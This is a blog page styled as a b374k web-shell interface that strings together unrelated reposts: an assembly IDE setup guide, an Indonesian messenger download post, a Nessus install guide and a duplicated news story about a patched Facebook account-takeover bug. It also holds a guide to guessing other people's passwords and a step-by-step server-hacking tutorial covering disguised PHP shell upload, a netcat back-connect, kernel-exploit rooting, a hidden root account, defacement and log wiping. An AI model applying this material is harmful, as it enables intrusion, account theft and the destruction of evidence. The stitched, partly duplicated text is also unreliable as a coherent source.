b374k
v10
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

Translate

"Guide to RadASM"Installing and Set Up Unknown rwxr-xr-x 0 18:01

Filename "Guide to RadASM"Installing and Set Up
Permission rw-r--r--
Author Unknown
Date and Time 18:01
Label
Action
RadASM is a very good IDE (Integrated Development Environment: think Visual Studio) for developing in most programming languages, though assembly language is where it shines. Not only is it one of the few IDEs out there that will work with assembly language, but the author has also put a significant amount of time and effort into it, making it extremely feature rich and robust. Many people use inline assembly in Visual Studio (using __Asm directives) but you really can’t get the level of control in these big-name IDEs as you can in this product. I used WinASM, a very good product, for years, but when I finally tried RadASM, it felt like someone had created it that really knew assembly language, and the hardships that can bring.
In this series of tutorials I will go over installing RadASM, running it, and creating programs in it, as well as some additional plugins and features. In the download for this tutorial (available on the tutorials
page) I have included all of the installation files for RadASM, as well as the Masm SDK, providing everything you need to program in assembly language. So let’s get started.
Please keep in mind that this is not an assembly language nor a Windows programming tutorial. It is assumed that both of these have already been learned. If you are rusty (or a beginner) I highly recommend the Windows assembly tutorials by Iczelion. Fortunately, they are also based on RadASM, so the transition should be very easy.
http://www.woodmann.com/RCE-CD-SITES/Iczelion/index.html

Installation

The first thing we need to do is install Masm onto our computer. Masm is the actual compiler (the same one Visual Studio uses) and has been around a very long time. There is an install.exe file in the Masm32v11r.zip file included in this download. Unzip it and run it- it will automatically install Masm onto your computer. I suggest, in order to eliminate problems in the future, you simply install it into it’s own folder in your root folder on your drive, for example “C:/MASM”.
Now we need to install RadASM itself.
The first file we need is RadASM.zip. This is the main IDE files. Copy these into a new folder. This will now be your root install directory, so you may want to copy this folder in to your Program Files folder, make a shortcut etc.) Next we need to add support for Masm (or TASM, GoASM or nASM). As RadASM is a generic IDE, and works with pretty much any language you can throw at it, we need to give RadASM the specific details about the assembly language we’ll be using.
Open the Assembly.zip file and copy the appropriate folder to the root folder of the RadASM installation. I copied the Masm folder, as that’s the type of assembly I work in (and most others do as well). If you wish to work in one of the other languages, you can copy those as well. We also need to copy the associated .ini file in the root folder as well, in my case Masm.ini. Finally, copy the appropriate .ct and .kwl files into the addins folder in the root of the RadASM folder.
Next, copy the RadASM.chm help file into the Help folder in the RadASM root installation folder. Now, when you click “Help”->”RadASM” in the IDE, this help file will be displayed.
“RadLanguages.zip” contains additional languages (besides English) if you wish to have the IDE in a different language. It defaults to English.
Finally, as you are probably just getting started with assembly language, you can copy the “Demos.zip” and “Games.zip” contents into a Demo folder in the root installation folder. This will give you plenty of examples to look at.

Setting Up the Environment

Now run RadASM and you will see the basic layout:
First things first,  select Options->Programming Languages. Click the “…” button, select the Masm.ini file and hit the “add” button. Masm should now appear in the list of languages. If you have a different assembly type (or want to add additional types) like Tasm or GoASM,  repeat the process for each one. Then click OK. You now have support for that particular language:
Now, you may want to open up any project just to see the color scheme. Here, I loaded the “DragNDrop” project from RadASM root/Masm/Projects/DragDrop. The project file ends with a .rap. You will see the project in our Project Explorer on the right:
Now double-click on the DragDrop.asm file to open it in our code window:
as you can see, the default color scheme leaves a little to be desired. I personally can’t even see the dark blue text, though I am getting old, so what can I say. Let’s change the color scheme to something a little softer on the eyes. Select “Option”->”Color & Keywords”. This brings up the main color selector:
I don’t know about you, but I like to personalize my coding environment. his window allows you to do just that. The method to change colors starts with a theme. There are a couple that come with RadASM and if you look really hard, you can find some additional ones online. But since EVERY option (and I mean EVERY) is changeable, you really won’t need one. I started with the default theme, Dark Night, and modified it from there. If you prefer a lighter background, try one of the other themes. Just select it and click “Load”, the n”Apply” and you will see it pop up. Start with whatever theme is closest to what you like, then you can fine-tune it from there.
To fine-tune it, we go to the Colors and Syntax box below. Here, we choose any type of instruction and select a color for it. You can either select a default color under the Colors group, or you can double-click the type in the Syntax group and select any color you want. For example, if I write a quick comment in the code:
and decide I would instead like it green, I would open the color picker, double-click “Comment” under the Synatx group, and pick a nice green. Clicking Apply will then show me the results:
Because there are so many options that can have their colors changed, a lot of times I will simply look for a color I don’t like in the Syntax group and then change it. Eventually, you will learn what each group type is, or through trial and error will figure it out. After selecting the color I prefer, I now have my own color scheme:
If one of you reading this tutorial would like my exact colors (or want to trade with someone else), you can open the RadASM.ini file provided in this download and copy everything under the “[Colors]” section into the RadASM.ini file in your root folder, replacing what you have with what you copied. Your colors will then match mine exactly.
The last thing I like to do is change the default font. I find the default one a little blocky, so I have included a font designed for assembly language users in mind (I don’t know if this is true, but it sure is a lot better than the default.) It is called Dina, and is in the download with this tutorial. Just unzip the contents and copy them in to the Windows font folder, re-run RadASM, and select “Option”->”Font options”. Now, select the installed Dina font for the first three:
Some other configuration in the Option menu you may want to look at are the following:
  • Languages: Changes the IDE language (if you prefer German, for example)
  • Programming Languages : Adds new templates for additional programming languages.
  • Code Editor Options: Change tab stops, backup policies etc.
  • Dialog Editor Options: For changing the look of dialogs in the Dialog Editor.
  • Menu Accelerators: For adding your own hot-keys.
  • Addin Manager: For adding and deleting addins.

The Toolbar

Depending on which addins you have installed, the addins icons at the right-hand side may be different, though Notepad and Windows Calc will always be the first two icons.
One interesting feature that should be pointed out is the “Tabs” button. This opens the Tabs toolbar:
Filename
Permission rw-r--r--
Author Unknown
Date and Time 17:50
Label
Action

Download BlackBerry Messenger Untuk iOS dan Android

Download BlackBerry Messenger Untuk iOS dan Android-BlackBerryMessenger, Aplikasi smartphone BlackBerry Messenger katanya RIM berencana untuk merilis aplikasi dan layanan BlackBerry Messenger atau sering di sebut BBM yang bisa di gunakan untuk sistem operasi iOSdan Android. Sudah tahu kan blackberry messenger itu ?

BlackBerry Messenger adalah program pengirim pesan instan yang disediakan untuk para pengguna perangkat BlackBerry. Aplikasi ini mengadopsi kemampuan fitur atau aktivitas yangPopuler di kalangan pengguna perangkat telepon genggam. Contohnya fitur di aplikasiGoogle Maps atau Yahoo Messenger hingga aktivitas dengan Facebook atau Twitter. Semuanya bisa didapatkan oleh pengguna perangkat BlackBerry pada aplikasi ini. BlackBerry Messenger merupakan salah satu keunggulan dari penggunaan perangkat BlackBerry selain layanan Push Mail.

Download BlackBerry Messenger Untuk iOS dan Android 


Layanan Messenger ini dibuat khusus bagi pemilik BlackBerry dan dirancang khusus untuk berkomunikasi di antara pengguna. Cara menggunakan BlackBerry Messenger adalah dengan penghubung nomor PIN yang juga eksklusif dimiliki masing-masing perangkat BlackBerry, (sumber wikipedia.org )

RIM dikabarkan menawarkan aplikasi BlackBerry Messenger untuk pengguna iOS dan Android secara gratis, namun pengguna akan dikenakan biaya ketika menggunakan layanan BlackBerry Messenger ini. Menurut sebuah sumber yang terpercaya, RIM akan merilis BlackBerry Messenger versi Android pada tahun ini dan kemudian tidak lama akan merilis BlackBerry Messenger versi iOS.

Kita Nantikan saja yah kehadiran BBM ini .. so jadi nggak usah lagi deh beli BB untuk bisa BBM cukup beli iOS ama android Yang lebih cangih :D

BlackBerry Messenger Untuk iOS dan Android di perkirakan akan rilis pada akhir september atau lebih awal. agar sahabat blogger, bisa mendapatkan pemberitahuan langsung dari RIM jika BlackBerry Messenger rilis, anda bisa mengikuti step by stepnya :

Step 1 : Buka halama ini us.blackberry.com/bbm.html

Step 2 : Disana ada sebuah form untuk mendaftar email anda.

Step 3 : Masukan Email yang valid dan sering anda gunakan, ini bertujuan untuk pemberitahun jika BBM untuk iOS dan Android rilis, RIM akan mengirim langsung ke email anda.


Untuk bisa menggunakan BBM hanya berjalan di sistem oprasi minima ics untuk android dan iOS 6 untuk iOS, dan hanya tersedia untuk smartphone bukan tablet dan iPad

Update : sebenarnya Aplikasi BBM untuk iOS telah masuk di Appstore, 3 minggu yang lalu. dan masih dalam tahap review. setelah tahap review selesai, maka Aplikasi BBM untuk iOS akan tersedia dan dapat anda download melalui Appstore.

Update : Menurut beberapa sumber, Blackberry untuk iOS dan Android akan di umumkan di indonesia pada tanggal 19 september, tapi hal ini bukan berarti BBM akan dirilis pada tanggal tersebut, kita lihat apa yang terjadi pada tanggal tersebut, Apakah ini hanya sebuah rumor ?

Update : Saat ini Blackberry messenger sudah tersedia untuk Android dan Bisa anda install di Perangkat yang menggunakan OS ICS. Tapi masih belum bisa terkoneksi ke server Blackberry

BBM akan rilis untuk android hari ini, dan iOS di perkirakan rilis besok pada hari minggu, tetap terhubung dengan Blog ini dan saya akan update link download untuk BBM for android and iPhone 

Link Download BBM Untuk iPhone .iPA (Jailbreak Only)

Link Download BBM Untuk Android .Apk
Filename
Permission rw-r--r--
Author Unknown
Date and Time 12:24
Label
Action
EditMethod 1 of 3: Get Started

1Type in the person's username. If the username is required, then this is the first step to being able to guess the password. If you don't know the person's username, try to find his username from a variety of other sources, such as the person's username in various social networking sites such as Twitter.


2See if the password has to meet any requirements. See if the password has to be a certain length (typically passwords have to be at least 6 characters long), and if it has to have at least one number or one symbol. If you're not sure, you can try setting up your own account at the site where you're trying to guess the password from, and you'll be told the requirements of the password.
3Ask for a hint. If the password has a "hint" option, then ask for a hint to guide you in guessing the password. The hint question can be something like, "What is your mother's maiden name?" or "What is the name of your first pet?" These questions can help narrow down your guessing; though you may not know the name of the person's first pet, you can guess from a number of pet names. Or, if you want to be extra sneaky, you can try to bring up first pets in a conversation with that person.
The hint can narrow down your search quite a bit if you know some personal information about that person. For example, if the question is, "Where were you born?" you may already know the person's birth state -- or even his birth city.
EditMethod 2 of 3: Use Password Tricks
1Guess the most common passwords. At the end of every year, a list of the 25 most common passwords is released. These passwords are the easiest to guess and thus the most commonly hacked. Though you should avoid picking any of these passwords for yourself, try guessing from this list of passwords:[1]
password
123456
12345678
abc123
qwerty
monkey
letmein
dragon
111111
baseball
iloveyou
trustno1
1234567
sunshine
master
123123
welcome
shadow
ashley
football
jesus
michael
ninja
mustang
password1
2Use some common password tricks. Other than guessing the most obvious passwords, there are a few tricks that are used by professional password guessers. They know, for example, that there's at least a 50% chance that a user's password will have one or more vowels. Here are a few other tricks that you should know:[2]
If the password has a number in it, it will be usually be a 1 or a 2 and it will be at the end of the password.
If there's a capital letter in the password, it will usually be at the beginning -- often followed by a vowel.
3Know that gender can also help predict a person's password. Women tend to use personal names in their passwords, while men prefer to use their hobbies or interests instead. For example, a woman can place her husband or best friend's name in a password, while men can have a password related to his favorite sports team, favorite sport, or favorite athlete.
Men may also use their favorite athlete's jersey number for the numbers in their password.
EditMethod 3 of 3: Guess Passwords Related to the Person
1Guess personal names. Many people have personal names in their passwords. Most people wouldn't put their own names in a password, but you could try those anyway. Here are some other names to try when you're guessing a password:
The name of the person's significant other or spouse
The names of the person's siblings
The name of the person's current or favorite pet
The name of the person's (especially a male's) favorite athlete
The person's childhood nickname or current nickname
2Guess the person's hobbies and interests. You can also guess a password by thinking of the person's hobbies or interests. Here are some tricks to try:
Try combining a man's favorite athlete with his favorite sport. For example: "Tigergolf" or "Kobebball."
Guess the name of a woman's favorite TV show, or the name of a favorite character on that show.
Guess the name of a person's favorite athletic hobby. If the person loves to swim, try "Swimmer" with some numbers after it.
3Guess important numbers. Many people use numbers in their password, indicating a date or a lucky number. Some people even make their whole password consist of numbers. You can try these numbers on their own, or add them to the end of one of the words that you guessed. Here are some ways to guess a person's password based on numbers:
Guess the person's birthday. For example, if the person's birthday is 12/18/75, type in "121875" or "12181975."
Try the person's street address. The person's street address, such as 955, could be a part of the password.
Try the person's lucky number. If the person has been vocal about what his lucky number is, try it.
If the person played a sport, try his jersey number as part of the password.
Try a part of the person's phone number.
Try the person's graduating class from college or high school.
4Guess the person's favorite things. You can also guess the person's password by guessing from a number of the person's favorite things. Here are a few favorite things to try:
The person's favorite TV show.
The person's favorite movie.
The person's favorite food.
The person's favorite book.
Filename
Permission rw-r--r--
Author Unknown
Date and Time 22:33
Label
Action

How to hack any Facebook account in under a minute, by sending just one SMS


If you're new here, you may want to subscribe to the RSS feed, like us on Facebook, or sign-up for the free email newsletter which contains computer security advice, news, hints and tips. Thanks for visiting!
Facebook mobile phoneA UK-based security researcher going by the name of “fin1te” has earned himself $20,000 after uncovering a way to hack into any account on Facebook, just by sending a mobile phone text message.
This should – obviously – have been impossible, but due to a weakness in Facebook’s tangled nest of millions and millions of lines in code, potentially hundreds of millions of accounts were vulnerable to hijacking through the simple technique.
Fin1te (real name Jack Whitten) has documented how the hack works on his blog.
The first thing to do is send the letter “F” in an SMS message to Facebook, as though you were legitimately registering your mobile phone with the social network. In the UK, the SMS shortcode for Facebook is 32665.
Send an SMS to Facebook
Facebook responds, via SMS, with an eight character confirmation code.
The normal sequence of events would be to enter that confirmation code into a Facebook form, and go on your merry way…
Facebook mobile activation form
But fin1te discovered that a vulnerability existed on that form, that could be exploited to use the confirmation code he had been sent by Facebook via SMS with *anyone* else’s account.
What fin1te had uncovered was that one of the elements of the mobile activation form contained, as a parameter, the user’s profile ID. That’s the unique number associated with your intended target’s account.
Profile ID parameter inside form
Change the profile ID that is sent by that form to Facebook, and the social network might be duped into thinking you are someone else linking a mobile phone to their account.
Therefore, the first step needed to hijack someone’s account in this way requires your victim’s unique Facebook profile ID.
If you don’t know what someone’s numeric profile ID is, you can always look it up using freely-available tools – they aren’t supposed to be a secret.
Find a Facebook profile ID
Sure enough, fin1te was able to replace the profile ID parameter sent by his browser to Facebook with the unique number of the account he wanted to access…
Facebook hack data
.. and within seconds his his mobile phone was sent an SMS confirming that he had successfully connected the device to the account.
Facebook confirmation SMS
Success. A Facebook account now has a third-party’s mobile phone number associated with it. Without any need for malware or phishing. All that was done was to send an SMS text message.
The final stage of the account hijacking is straightforward. Facebook allows you to log into its system using your mobile number rather than an email address if you want, so at login you enter the mobile phone number you have associated with your victim’s account, and request a password reset via SMS.
Reset code
Sure enough, fin1te discovered that Facebook duly sent him the password reset code for the account – meaning he could change the account’s password, and lock out its legitimate user.
This is an incredibly simple but powerful way to take over anybody’s Facebook account.
The good news is that fin1te disclosed the vulnerability responsibly to Facebook, rather than exploited it for malicious intentions or sold it to other parties. Facebook has fixed the problem so others can no longer take advantage of this serious security hole. For his troubles, Facebook awarded fin1te a hefty $20,000 worth of bug bounty and fixed the vulnerability.
But there’s no doubt that on the underground market, perhaps sold to cybercriminals or intelligence agencies, fin1te’s discovery could have earned him even more money.
Who knows what other serious security vulnerabilities may lay inside Facebook that haven’t been responsibly reported to the company’s security team?
If you are on Facebook, and want to be kept up to date on the latest privacy and security risks threatening users, be sure to Like the “Graham Cluley Security News” Facebook page .

Post by Graham Clueley
Filename
Permission rw-r--r--
Author Unknown
Date and Time 22:32
Label
Action

How to hack any Facebook account in under a minute, by sending just one SMS

If you're new here, you may want to subscribe to the RSS feed, like us on Facebook, or sign-up for the free email newsletter which contains computer security advice, news, hints and tips. Thanks for visiting!
Facebook mobile phoneA UK-based security researcher going by the name of “fin1te” has earned himself $20,000 after uncovering a way to hack into any account on Facebook, just by sending a mobile phone text message.
This should – obviously – have been impossible, but due to a weakness in Facebook’s tangled nest of millions and millions of lines in code, potentially hundreds of millions of accounts were vulnerable to hijacking through the simple technique.
Fin1te (real name Jack Whitten) has documented how the hack works on his blog.
The first thing to do is send the letter “F” in an SMS message to Facebook, as though you were legitimately registering your mobile phone with the social network. In the UK, the SMS shortcode for Facebook is 32665.
Send an SMS to Facebook
Facebook responds, via SMS, with an eight character confirmation code.
The normal sequence of events would be to enter that confirmation code into a Facebook form, and go on your merry way…
Facebook mobile activation form
But fin1te discovered that a vulnerability existed on that form, that could be exploited to use the confirmation code he had been sent by Facebook via SMS with *anyone* else’s account.
What fin1te had uncovered was that one of the elements of the mobile activation form contained, as a parameter, the user’s profile ID. That’s the unique number associated with your intended target’s account.
Profile ID parameter inside form
Change the profile ID that is sent by that form to Facebook, and the social network might be duped into thinking you are someone else linking a mobile phone to their account.
Therefore, the first step needed to hijack someone’s account in this way requires your victim’s unique Facebook profile ID.
If you don’t know what someone’s numeric profile ID is, you can always look it up using freely-available tools – they aren’t supposed to be a secret.
Find a Facebook profile ID
Sure enough, fin1te was able to replace the profile ID parameter sent by his browser to Facebook with the unique number of the account he wanted to access…
Facebook hack data
.. and within seconds his his mobile phone was sent an SMS confirming that he had successfully connected the device to the account.
Facebook confirmation SMS
Success. A Facebook account now has a third-party’s mobile phone number associated with it. Without any need for malware or phishing. All that was done was to send an SMS text message.
The final stage of the account hijacking is straightforward. Facebook allows you to log into its system using your mobile number rather than an email address if you want, so at login you enter the mobile phone number you have associated with your victim’s account, and request a password reset via SMS.
Reset code
Sure enough, fin1te discovered that Facebook duly sent him the password reset code for the account – meaning he could change the account’s password, and lock out its legitimate user.
This is an incredibly simple but powerful way to take over anybody’s Facebook account.
The good news is that fin1te disclosed the vulnerability responsibly to Facebook, rather than exploited it for malicious intentions or sold it to other parties. Facebook has fixed the problem so others can no longer take advantage of this serious security hole. For his troubles, Facebook awarded fin1te a hefty $20,000 worth of bug bounty and fixed the vulnerability.
But there’s no doubt that on the underground market, perhaps sold to cybercriminals or intelligence agencies, fin1te’s discovery could have earned him even more money.
Who knows what other serious security vulnerabilities may lay inside Facebook that haven’t been responsibly reported to the company’s security team?
If you are on Facebook, and want to be kept up to date on the latest privacy and security risks threatening users, be sure to Like the “Graham Cluley Security News” Facebook page .
Filename
Permission rw-r--r--
Author Unknown
Date and Time 19:53
Label
Action

How to Install Nessus on Backtrack 5 - Enable Nessus on Backtrack

Nessus 4.4.1 now comes pre-installed on BackTrack 5 and requires that the user activate the installation. Before you activate Nessus on your BackTrack 5installation, be certain you have installed Nessus either to the hard drive on the computer you plan to use or inside of a virtual machine that you plan to keep on the same host system. If you activate Nessus on a bootable USB thumb drive, DVD or avirtual machine and move it to a new host system, the Nessus activation code will no longer be valid. The Nessus activation ties itself to the physical system on which it is installed. If you do decide to move the virtual machine to a new system, or jump around to different systems using a bootable USB thumb drive or DVD, you will have to re-activate Nessus. If you are using a Nessus ProfessionalFeed, you are allowed to reset your activation by clearing the current connection between a host and anactivation code. By logging into the Tenable Customer Support Portal and going to "Activation Codes", you can reset the activation code-to-host pairing. ProfessionalFeed users are currently limited to one reset every 30 days. HomeFeed users will need to re-register Nessus when moving between physical hosts.

Install and activate Nessus on Backtrack 5r3
Install and activate Nessus on Backtrack 5r3

Step 1 - Obtaining An Activation Code


Once you have Nessus installed on BackTrack 5, you will need to obtain a Nessusactivation code.  If you are using Nessus at home or wish to evaluate Nessus, you can register a HomeFeed. It’s important to note that the HomeFeed is limited to 16 IP addresses per scan (whereas the ProfessionalFeed allows you to scan an unlimited number of IP addresses). The ProfessionalFeed also gives you access to features such as Configuration and Sensitive Data Auditing, SCADA plugins, Nessus Technical Support and access to the Tenable Customer Portal.

Step 2 - Activating Nessus

Be certain that your BackTrack 5 installation has access to the Internet and activate Nessus using your newly obtained activation code as follows:

Activating Nessus
Activating Nessus


As shown above, this will also initially download the appropriate plugins based on which feed you've chosen.

Step 3 - Creating A User Account

Now you will create the initial user account that will be used to login to the Nessus Web Interface:

Add user in nessus
Adding User in Nessus

After you've entered a username, the nessus-adduser program asks you if the user account should have admin privileges or not. It is recommended that the initial user account have admin privileges so you can use the Nessus Web Interface to create subsequent accounts. The only difference between a Nessus admin user and a regular user is the ability to create user accounts.

Step 4 - Starting Nessus

Using the supplied startup script, start the Nessus server:

Starting Nessus on Backtrack
Starting Nessus on Backtrack
Step 5 - Accessing the Nessus Web Interface

Once Nessus has been initially started, it will begin to index and compile all of the plugins. This can take some time, depending on the speed of your system. If Nessus is still processing plugins, you may see the following screen when accessing the web interface:

Initializing Nessus
Initializing Nessus

The web interface can be accessed with your browser by making an HTTPS connection to TCP port 8834 (e.g. https://localhost:8834/). If you are using a browser local to the BackTrack 5 distribution, such as the supplied version of Firefox, be certain that you enable Flash and JavaScript for this site (Flash is required to access the Nessus Web Interface, and JavaScript is required to view some of the reports). You can also access the Nessus Web Interface remotely by using the IP address assigned to BackTrack 5 (e.g. https://192.168.1.250:8834/).

Posted By Hackingloops

Filename
Permission rw-r--r--
Author Unknown
Date and Time 20:23
Label
Action

Tutorial on Web Hacking by Akatzbreaker

Web-Hacking is a huge topic that I could easily discuss for hours.

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server
Everything you need to know….

Tools you need:

- Backtrack (Backtrack Website)
- Firefox (get it from here….) – Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here….
- iCon2PHP (Get it from here….)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below…..)
- Acunentix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)

About the Tools:

Backtrack
– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….
Netcat
– Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
– While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
                — If I listed the above options according to their reliability :                                 
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

- – -  Before we begin  – - -

-Boot to Backtrack
-Connect to your VPN or to Tor.
-It would be good to read a complete guide to stay anonymous while hacking here…
-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix (find tutorial at Hackforums.net). Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.
The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:
-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.
iCon2PHP Terminal Output:
[...]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.
Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

Now that you have shelled your website we can start the proccess to root the server.
What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…
Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port you forwarded….)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
– Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).
Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file.
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log

End of this Tutorial:

This was a great tutorial on Web-Hacking. I reasure you that more hacking tutorials are coming.
Great community about hacking at Hackforums.net

SOURCE BY G'N'A HACKER COMUNITY

 

Jayalah Indonesiaku © 2010 SouthGrinder Hacker
VB (Vio b374k) Template design by p4r46hcyb3rn3t